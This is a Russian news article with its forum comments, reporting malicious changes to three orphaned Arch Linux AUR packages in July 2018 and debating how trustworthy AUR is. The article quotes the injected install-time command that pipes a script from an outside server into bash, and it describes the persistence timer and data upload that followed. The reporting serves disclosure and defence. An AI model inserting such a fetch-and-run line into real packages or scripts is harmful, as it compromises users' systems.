The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

В AUR-репозитории Arch Linux найдено вредоносное ПО

11.07.2018 08:59

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

  1. Главная ссылка к новости (https://sensorstechforum.com/a...)
  2. OpenNews: Из каталога Docker Hub удалено 17 образов контейнеров с вредоносным кодом
  3. OpenNews: Компания Canonical опубликовала заявление, связанное с вредоносным ПО в Snap Store
  4. OpenNews: В четырёх популярных дополнениях к Chrome выявлен вредоносный код
  5. OpenNews: В каталоге Python-пакетов PyPI выявлено 10 вредоносных библиотек
  6. OpenNews: Атака на Kodi, VLC и Popcorn-Time через вредоносные субтитры
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/48948-aur
Ключевые слова: aur, archlinux
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (128) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 10:22, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –13 +/
    >учётная запись разработчика xeactor заблокирована

    Как-то нетолерантно.

     
     
  • 2.127, Fantomas (??), 17:21, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Уууууу, толераст
     

  • 1.2, Michael Shigorin (ok), 10:24, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –12 +/
    По сути от'whitehat'ил...
     
     
  • 2.6, Atterratio (ok), 10:45, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +26 +/
    А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
     
     
  • 3.20, Michael Shigorin (ok), 11:32, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –17 +/
    Это было удивление тем, что заблокировали вместо того, чтоб сказать спасибо за науку.
     
     
  • 4.28, Аноним (28), 12:22, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +12 +/
    За какую науку? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
     
     
  • 5.103, Джон Ленин (?), 00:13, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    AUR полностью аналогичен PPA, и цели для которых он предназначен конвертация чужих пакетов и git clone со сборкой всяких патченых мез и вайнов.

    Просто нефиг из аура собирать системные компоненты и ставить осиротелый софт. Плюс к тому, никто тебя и не принуждает пользоваться всякими PPA/AURами.

     
  • 3.23, Аноним (23), 11:49, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +8 +/
    > А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.

    "Я не я, и лошадь не моя!" - это в таких вот новостях.
    А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУР:
    https://repology.org/statistics/total
    ;)


     
     
  • 4.56, Аноним (56), 15:49, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    в связи с этим случаем я даже видел заявление, что AUR (Arch User Repository) никакого отношения к арчу не имеет
     
     
  • 5.79, soarin (ok), 19:40, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Фанатики, сэр.
     
  • 4.104, Аноним (104), 00:14, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Объясняю для танкистов Момент первый В АУРе примерно 25-40 поддерживаемых сбо... большой текст свёрнут, показать
     
     
  • 5.111, Аноним (23), 03:12, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > С помощью этих скриптов с пол пинка создаётся пакет, который потом под контролем пакетного менеджера (а не бардак, как у адептов configure && make && make install)

    checkinstall? Не, не слышали!

    > Да в текущем виде подобных атак можно провести вагон и тележку -
    > в постинстальные скрипты добавить патч Бармина, например. Отсюда и всякие "Any
    > use of the provided files is at your own risk", который
    > болдом висит на главной странице АУРа, отсюда и манёвры с Trusted
    > Users, отсюда и голосовалка, чтобы откровенная дрянь или мало кому нужная
    > херня не попала в community.

    Отсюда и полная неуместность сравнения с нормальными репами того же дебиана, о чем собственно и речь.


     
  • 4.105, Джон Ленин (?), 00:19, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    То, что скрипт сборки умеет лазить в репозитории дебианов и федор, тягать оттуда их пакеты и конвертить в свои, это конечно фатальный недостаток, да.

    И то, что он из git умеет собирать бинарный пакет, - это тоже страхъ, да.

     
  • 4.112, лютый охохоня... (?), 05:03, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >А вот когда речь идет о количестве софта в репе, то арчеводы почему-то

    Вапщта в Арче пакетов много даже БЕЗ aur.

    Плюс, в целом ситуация - когда обнаружили подставу всего через 7 часов показывает высокий уровень подготовки Арчеводов. :D Ты лучше убунтуям в PPA троян положи и посмотрим сколько лет он там пролежит незамеченным.

     
     
  • 5.120, Аноним (23), 12:10, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то
    > Вапщта в Арче пакетов много даже БЕЗ aur.

    Вапщта нет. И количество пакетов != количество софта.


     
     
  • 6.132, Аноним (132), 14:55, 13/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ага. Да и количество пакетов - не самый важный показатель.
     
  • 2.57, Аноним (56), 15:54, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    от'redhat'ил
     
     
  • 3.102, Аноним (102), 22:34, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Аргументируй
     
  • 2.77, crypt (ok), 18:57, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > По сути от'whitehat'ил...

    да, но скорее тестировали, как пройдет.


     

  • 1.3, Аноним (3), 10:35, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Отсюда вывод: никаких бинарных пакетов от людей не являющихся официальными разработчиками дистрибутива. Нужно что-то, чего нет в официальном репозитории, собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проекта.
     
     
  • 2.4, Atterratio (ok), 10:42, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.
     
     
  • 3.11, Celcion (ok), 10:52, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –8 +/
    > Мда... Я смотрю кто то не знает что такое AUR...

    И этот кто-то - ты.

    > Там нет этих ваших бинарных пакетов как в Ubuntu PPA

    Серьезно? А "-bin" пакеты - это что?
    https://aur.archlinux.org/packages/?O=0&K=-bin

     
     
  • 4.13, Аноним (13), 11:01, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Серьезно? А "-bin" пакеты - это что?

    А где лежат сами пакеты без подсказки догадаетесь?

     
     
  • 5.15, Celcion (ok), 11:02, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –8 +/
    >> Серьезно? А "-bin" пакеты - это что?
    > А где лежат сами пакеты без подсказки догадаетесь?

    Можно раскрыть мысль - а как это отменяет факт, что бинарные пакеты в AUR таки есть, о чем и было сказано?

     
     
  • 6.36, Аноним (36), 13:17, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.
     
     
  • 7.70, Celcion (ok), 17:35, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –5 +/
    > В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.

    Действительно, такие как ты очень любят настойчиво не понимать, с чем идет спор и настаивать на чем-то, с чем никто не спорил.
    Предыдущий оратор говорил, что в AUR все собирается из исходников и нет бинарей и спор был именно с этим. Я не утверждал, что бинари лежат прямо в AUR. Но тебе ведь наплевать. Тебе поспорить надо.

     
     
  • 8.107, Александр (??), 01:06, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Спор какой-то не в тему Впадлу что ли PKGBILD глянуть на предмет, от куда бинар... текст свёрнут, показать
     
     
  • 9.118, Celcion (ok), 09:36, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А впaдлу включить голову и попытаться понять, что речь идет не об этом Или ту... текст свёрнут, показать
     
     
  • 10.137, чебурнет.рф (ok), 05:27, 15/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ты должен остаться правым в интернете Что-бы не случилось, но ты должен остатьс... текст свёрнут, показать
     
     
  • 11.139, Celcion (ok), 10:16, 16/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Остаться правым можно в случае, если был какой-то спор А когда ты говоришь про ... текст свёрнут, показать
     
  • 7.92, Аноним (92), 20:37, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Так это ещё хуже, чем если бы они там были. Тупо в любой момент можно бинарник подменить.
     
  • 5.44, анонимус (??), 14:14, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Серьезно что ли?
    Откройте PKGBUILD, не поленитесь. Там в строчке source указано, где лежит бинарь
     
     
  • 6.133, Джон Ленин (?), 01:27, 14/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    ...и к нему контрольная сумма прилагается.

    Так например проприетарный торрент-клиент Tixati качается с официального сайта и конвертируется в родной пакет.

    ...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.

     
     
  • 7.140, Celcion (ok), 10:24, 16/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > ...и к нему контрольная сумма прилагается.
    > ...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.

    Верно. Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом самом внешнем сайте, даже если он проходит валидацию - не запихали в одном из релизов вошек? Какой-то неизвестный Вася, собиравший PGKBUILD, тебе за это поручится?
    Понятно, что это не будет проблемой AUR-а как таковой, но сам по себе AUR никто и не обвинял. Вопрос в том, что установка бинарных пакетов - есть. Со всеми из этого вытекающими потенциальными проблемами. Какой смысл с этим спорить, дескать, "а бинари не на самом AUR-е лежат!" - я фиг знает.

     
  • 4.16, Амнон (?), 11:05, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +9 +/
    > Серьезно? А "-bin" пакеты - это что?

    Тебе ещё раз повторяют: в самом AUR'е не содержится никаких пакетов, тем более бинарных. AUR - это сборник PKGBUILD'ов, скриптов сборки пакетов. Но в AUR'е присутствуют скрипты для установки бинарников, это да.

     
     
  • 5.30, виндотролль (ok), 12:25, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    В аур, думаю, можно коммитнуть бинарник (головой не ручаюсь, может быть у них там какие-то хуки стоят на пуш, а пробовать не приходилось) и добавить его в sources
     
     
  • 6.53, Арчевод (?), 15:32, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Нельзя
     
     
  • 7.55, виндотролль (ok), 15:47, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Почему?
    Точно можно всякие .desktop коммитить. И кажется, где-то даже видел .xpm в сорцах, что есть бинарник.
     
     
  • 8.93, Dmitry Shachnev (ok), 20:37, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И desktop, и xpm 8212 это текстовые форматы ... текст свёрнут, показать
     
     
  • 9.106, виндотролль (ok), 00:50, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Так а все таки, что помешает Запушить не позволят Не хочу заняться аур тестовы... текст свёрнут, показать
     
  • 5.72, Celcion (ok), 17:36, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Но в AUR'е присутствуют скрипты для установки бинарников, это да.

    Именно про это и говорилось, и ничего не говорилось про то, где бинарные пакеты расположены. Но зачем включать голову, напрягать зрение чтением, когда желание поспорить на пустом месте уже сформировалось, правда?

     
  • 4.87, axredneck (?), 20:17, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, они есть. Но достаточно скачать такой PKGBUILD и глянуть в нем, откуда качается бинарь, чтобы понять, стоит это ставить или нет.
     
  • 3.33, Vitaliy Blats (?), 12:29, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –6 +/
    > Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.

    Наркоманштoле ? Каким образом ты думаешь устанавливается софт по типу вайбера ?
    Нее, с официального сайта качается deb-файл, оттуда вытягивается бинарник и ставится согласно окружению.

    Прости что разрушил твой уютный мирок.

     
     
  • 4.39, админ локалхоста (?), 14:01, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    вот только в AUR-е от этого бинарников не появилось
     
     
  • 5.54, Vitaliy Blats (?), 15:34, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > вот только в AUR-е от этого бинарников не появилось

    Это каким-то образом отменяет установку бинарника ?

     
     
  • 6.108, Александр (??), 01:19, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    С каких пор установка бинарей с оф. сайтов стала трагедией?
     
  • 2.5, rand (?), 10:45, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Этот вывод не отсюда. В данном случае хватило бы просто прочесть скрипт сборки.
     
  • 2.8, виндотролль (ok), 10:45, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проекта

    AUR это и делает. Выкачать PKGBUILD из AUR и проверить 20-строчный скрипт на предмет закладок гораздо проще, чем этот самый скрипт написать.

    AUR FTW, ArchLinux one love, ну и там всякое такое...

     
     
  • 3.27, Аноним (27), 12:19, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    О да, для каждого пакета просматривать скрипт установки то еще удовольствие.
     
     
  • 4.35, Shatur (ok), 12:59, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый скрипт сборки.
     
     
  • 5.59, J.L. (?), 16:15, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый
    > скрипт сборки.

    кстати а при обновлении из AURа пакетный манагер обновляет или говорит что низя и надо смотреть?

     
     
  • 6.62, Аноним (62), 16:41, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Смотря какой манагер. yaourt обновляет, но отдельно от бинарных реп, и предлагает каждый pkgbuild посмотреть.
     
     
  • 7.86, axredneck (?), 20:13, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Более того, он может обновлять через git и предлагать проверить не весь PKGBUILD, а только изменения в нем.
     
  • 7.100, ы (?), 21:26, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    на всякий случай про текущую ситуацию с yaourt: https://www.reddit.com/r/archlinux/comments/8wp9ep/psa_that_shouldnt_be_needed
     
     
  • 8.129, UzerBluzer (?), 21:04, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Сейчас в моде aurman Держу в курсе ... текст свёрнут, показать
     
  • 6.64, анан (?), 16:43, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    при каждой установке  или обновлении пакета предлагает посмотреть
     
     
  • 7.75, J.L. (?), 18:21, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > при каждой установке  или обновлении пакета предлагает посмотреть

    а много можно понять по такому билдскрипту?
    https://www.opennet.ru/openforum/vsluhforumID3/114809.html#48

     
     
  • 8.109, Александр (??), 01:23, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Увы, но что-то я там не увидел билдскрипта ... текст свёрнут, показать
     
     
  • 9.122, J.L. (?), 12:50, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    а что же там Kусок из PKGBUILD chromium-dev ... текст свёрнут, показать
     

  • 1.7, odity (ok), 10:45, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    В скрипте не видно,что он создает в usr/lib/systemd/system что-то
     
     
  • 2.10, SysA (?), 10:50, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Как это?!..
     
  • 2.126, Аноним (126), 17:20, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    /usr/lib/systemd/systemd.so ? :-)
     

  • 1.9, Аноним (-), 10:47, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    ну, учитывая что в аур даже варез заливают, заголовок желтоват. "Доверяй, но проверяй"
     
  • 1.12, виндотролль (ok), 10:53, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    мне видится 1 потенциально удачный сценарий атаки на AUR — сделать вредоносный патч на сишечке, а лучше перле к какому-нибудь сложному софту (чтоб нелегко было разобраться) с аргументацией, что патч что-то улучшает (Arch позволяет делать патчи частью пакета). Лучше если будет много патчей, да чтоб часть из них правда делала что-то полезное, а без некоторых сборка на арче была невозможна.

    Тогда — высока вероятность, что вредоносный патч заметят очень не сразу.

     
     
  • 2.17, emaName (?), 11:09, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    И что это за мегапопулярный пакет будет, что кто-то будет этим заморачиваться?
     
     
  • 3.22, Аноним (22), 11:44, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Навскидку - гуглохром подойдёт. Особенно пикантно, если патчи будут чистить гуглозонды. Параноики же должны страдать, правда?
     
     
  • 4.24, emaName (?), 11:49, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вряд ли к таким пакетам проходимец какой-нибудь дорвется.
     
     
  • 5.32, nrv (ok), 12:26, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    К основному Хрому да.
    А к какой-нибудь патченной в ауре, которая типа буз гуглозондов (вообще, есть хромиум, но, с другой стороны, хром не только зондами отличется, но это так, лирика).
    Концепция видится мне рабочей, не обяхательно хром, пример не слишком удачный.
    Но много народу не заразить таким образом, наверное.
     
  • 4.25, emaName (?), 11:51, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.
     
     
  • 5.48, Аноним84701 (ok), 14:43, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Вопрос в том, мониторят ли так же и все сторонние патчи Kусок из PKGBUILD chrom... большой текст свёрнут, показать
     
     
  • 6.65, анан (?), 16:46, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    там у каждого файла по рекомендациям должна быть хеш, если изменить файлы то хеш не сойдется, но в принципе я думаю никто не следит за тем что хеши обновляются
     
     
  • 7.76, виндотролль (ok), 18:33, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > там у каждого файла по рекомендациям должна быть хеш, если изменить файлы
    > то хеш не сойдется, но в принципе я думаю никто не
    > следит за тем что хеши обновляются

    блин, это ж естественно, что хеши обновляются. Код меняется, патчи адаптируются под новый код.
    Тут все только не доверии. Кажется, кстати, можно пакеты в AUR подписывать gpg ключом (не уверен, но вроде бы встречалось такое).

     
     
  • 8.80, пох (?), 19:42, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    а смыл-то в чем Вот подпишу я тебе своим ключом пакет, создающий у тебя в хомяк... текст свёрнут, показать
     
  • 4.88, axredneck (?), 20:19, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    В смысле, Хромиум? А то к Хрому сишные патчи не применишь.
     

  • 1.18, Gentoo Developer (?), 11:24, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Только Gentoo!
     
     
  • 2.73, Васёк (?), 17:54, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Иногда нужно работать а не компилировать
     
     
  • 3.89, axredneck (?), 20:25, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Можно make -j1 в фоне в /tmp. Если в /tmp места нет, то BFQ. Но опять же приходится доверять тому, что в оверлеях.
     
  • 3.138, FSA (??), 13:22, 15/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вот реально в фоне бывает крутится сборка какого-то крупного обновления Из неуд... большой текст свёрнут, показать
     

  • 1.19, Чебур (?), 11:30, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +17 +/
    На свалке нашли мусор, вот так новость.
     
     
  • 2.21, iPony (?), 11:38, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Новость наверно в том, что раньше не находили.
    Это немного удивительно.
     
     
  • 3.29, рачевод (?), 12:25, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Новость наверно в том, что раньше не находили.
    > Это немного удивительно.

    удивительно, что никто не хотел рыться в свалке, чтобы убедиться ? ;-)
    Ну вот, нашлись какие-то бомжи, может рассчитывали озолотиться на сдаче во вторсырье.

     
  • 3.49, Андрей (??), 14:53, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Так, может, там такого добра ещё много. Но только один чел взял и намеренно создал файлик ваш.archlinux.скомпрометирован.txt, так что не заметить было просто нельзя.
     
  • 2.42, anonimm (?), 14:08, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Эта новость, наверное, больше удивила тех, кто с миром Arch не знаком (в частности, меня): оказывается, у них там принято копаться по помойкам!
     

  • 1.34, Аноним (34), 12:39, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Почалось! Я давно уже ждал когда начнется распространение заразы со всяких ppa помоек, по которым любят шарится фанаты пакетных дистров. Давно пора.
     
     
  • 2.50, Андрей (??), 14:55, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А типа в ядро или другой проект не может попасть вредоносный код. Мэйнтейнеры только код от новичков отфутболивают. Так что достаточно попасть на ПК не новичка или его учётку, чтобы увеличить шансы прохождения.
     
     
  • 3.115, Аноним (115), 08:40, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Достаточно не новичку захотеть реальных денег за свои труды. Что такое доверие, если ты не знаешь всех этих людей и ответственности у них нет кроме позора в маргинальной среде и удаления учетки?
    Пока выходят программы, которых нет ни в дистрах, ни в официальных репах разработчика весь этот бред и будет твоирться. Софт можно найти только в ненадежных источниках. Какая туту безопасность?
     
  • 2.94, Аноним (94), 20:46, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.opennet.ru/opennews/art.shtml?num=24610 - я просто оставлю это здесь.
     

  • 1.38, commiethebeastie (ok), 13:45, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Так AUR помойка, зато в ней есть практически всё.
     
     
  • 2.40, Аноним (-), 14:06, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Мое любимое место, столько хaлявной тухлятинки, мммм... обожаю. ;)
     
     
  • 3.41, commiethebeastie (ok), 14:07, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Тухлятинка обычно не собирается.
     
     
  • 4.134, Джон Ленин (?), 01:33, 14/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальную репу llvm-svn

    Там такая логика, что без одного ты не соберёшь другое, а собирать всё из сорцов — жизни не хватит чтоб разобраться с еггогами.

     

  • 1.46, Совсем другой Аноним (?), 14:18, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Забавные они там все.
    Вот просто так валяется хлам и каждый может ещё сверху нагадить.
    Не у всех видимо есть ресурсы на создание чего-то по типу Suse build service.
     
     
  • 2.47, нах (?), 14:25, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    так вроде сузя его уже тоже - тогось, остался урезанный и с фейс-контролем на входе (что с одной стороны - как-то и уменьшает количество троянов, а с другой - сводит и количество полезных пакетов к околонулю)
     
     
  • 3.52, sergey (??), 15:17, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Вроде, нет. Любой желающий может собирать пакеты, как и раньше.
     

  • 1.51, J.L. (?), 14:55, 11/07/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    аааааяяя говорииииииил!!!!

    линукс надо защищать по дефолту и юзера от программ и программы от программ
    в винде в силу контингента иди^W пользователей оной с этим сейчас лучше чем в линуксе

     
     
  • 2.58, Аноним (58), 16:03, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    В виндоувсе со многими аспектами лучше, чем в линуксе.
     
     
  • 3.63, Клыкастый (ok), 16:41, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    с троянами и майнингом например
     
     
  • 4.69, нах (?), 17:34, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    в windows store - пока не замечено ни того, ни другого.

    В том числе да, и потому, что надо заплатить денег за сертификат. Пусть копеечных.

     
     
  • 5.74, Клыкастый (ok), 17:55, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > в windows store - пока не замечено ни того, ни другого.

    так там и софта не замечено

     
     
  • 6.78, пох (?), 19:37, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    патамуштанадазаплатитьзасертификат, ага. Ну то есть - помоечного софта незамечено, а непомоечного - так его и в гуглоплее днем с фонарем (и не вздумайте тот фонарь что первым нашелся поиском, и вторым, и третьим, где-то с пятнадцатого начинаются работающие, без требований доступа к sms и телефонной книжке)

    а казалось бы - бери и эксплойть миллионы виндохомячков (думаю, их все еще даже больше, чем владельцев андроедов, молчу уж про какой-то там рач и его полтора юзера, да еще и тянущих что попало с aur). Но нет, копеечная преграда - и никого на горизонте.

    P.S. месяц назад был изумлен, обнаружив там UBO. В общих чертах - вполне работающий. Казалось бы, где имение, а где вода?

     
     
  • 7.81, username (??), 19:47, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    В маке как то решают, все живы. Там сертификат подписи с оперативным отзывом со стороны apple и ревью приложения перед публикацией.
     
     
  • 8.84, soarin (ok), 19:59, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Не все Многие от туда просто свалили И распространяют свой софт не через AppSt... текст свёрнут, показать
     
     
  • 9.96, username (??), 21:03, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Свалили таки по другой причине Любой софт из стора работает в песочнице по моем... текст свёрнут, показать
     
  • 8.116, . (?), 09:31, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    идея та же что у MS, но уже не годится первый попавшийся code signing сертификат... текст свёрнут, показать
     
  • 7.83, soarin (ok), 19:57, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Ну то есть - помоечного софта незамечено

    Плохо смотрел. Этак в годах 2013-2014 я как-то туда лазил. Там жуть была.
    Потом правда занялись, и исправили это безобразие.

    https://www.instagram.com/p/svMZwyI66q/

    Без нормальной модерации другого не дано.

     
  • 3.98, Аноним84701 (ok), 21:19, 11/07/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > В виндоувсе со многими аспектами лучше, чем в линуксе.

    В смысле -- вместо долгих «нескольких часов», всего за какой-то жалкий месяц обнаружили, что кто-то хакнул  CCleaner, не поленившись до кучи еще и стырить ключ для подписи setup.exe и успел заразить пару миллионов пользователей?
    https://thehackernews.com/2017/09/ccleaner-hacked-malware.html


     
     
  • 4.128, нах (?), 17:27, 12/07/2018 [^] [^^] [^^^] [ответить]  
  • +/
    вот и не ставь всякой фигни с васян-сайтов, и под виндой тоже не.
    Хакнули-то cdn avast, а не microsoft store.

     

